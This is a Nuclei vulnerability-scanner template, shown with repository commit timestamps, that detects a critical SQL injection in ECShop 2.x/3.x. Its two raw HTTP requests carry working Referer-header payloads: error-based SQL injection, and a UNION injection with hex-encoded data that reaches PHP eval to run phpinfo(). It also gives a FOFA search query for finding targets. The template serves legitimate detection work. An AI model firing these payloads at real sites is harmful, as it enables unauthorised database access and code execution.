nuclei-templates/vulnerabilities/other/ecshop-sqli.yaml

55 lines
2.1 KiB
YAML
Raw Normal View History

id: ecshop-sqli
2021-11-07 02:03:09 +00:00
info:
name: ECShop 2.x/3.x - SQL Injection
2022-05-18 09:20:12 +00:00
author: Lark-lab,ImNightmaree,ritikchaddha
severity: critical
2022-05-23 10:43:10 +00:00
description: |
ECShop 2.x and 3.x contains a SQL injection vulnerability which can allow an attacker to inject arbitrary SQL statements via the referer header field and the dangerous eval function, thus possibly allowing an attacker to obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
2022-05-18 09:20:12 +00:00
- http://www.wins21.com/mobile/blog/blog_view.html?num=1172
2022-05-18 09:36:50 +00:00
- https://www.shutingrz.com/post/ad_hack-ec_exploit/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
2022-05-23 10:43:10 +00:00
metadata:
verified: true
fofa-query: app="ECShop"
2021-11-08 10:15:54 +00:00
tags: sqli,php,ecshop
2021-11-07 02:03:09 +00:00
2021-11-07 02:30:38 +00:00
requests:
2021-11-07 02:03:09 +00:00
- raw:
2021-11-07 02:36:28 +00:00
- |
GET /user.php?act=login HTTP/1.1
2021-11-07 02:03:09 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
2022-05-18 09:23:08 +00:00
2022-05-18 09:20:12 +00:00
- |
GET /user.php?act=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-05-23 10:43:10 +00:00
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
2021-11-07 02:03:09 +00:00
2022-05-23 10:43:10 +00:00
stop-at-first-match: true
2022-05-18 09:20:12 +00:00
matchers-condition: or
2021-11-07 02:03:09 +00:00
matchers:
- type: word
words:
2021-11-08 08:12:44 +00:00
- 'XPATH syntax error:'
- '[error] =>'
- '[0] => Array'
- 'MySQL server error report:Array'
2021-11-07 02:39:21 +00:00
condition: and
2022-05-18 09:20:12 +00:00
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
# Enhanced by mp on 2022/09/28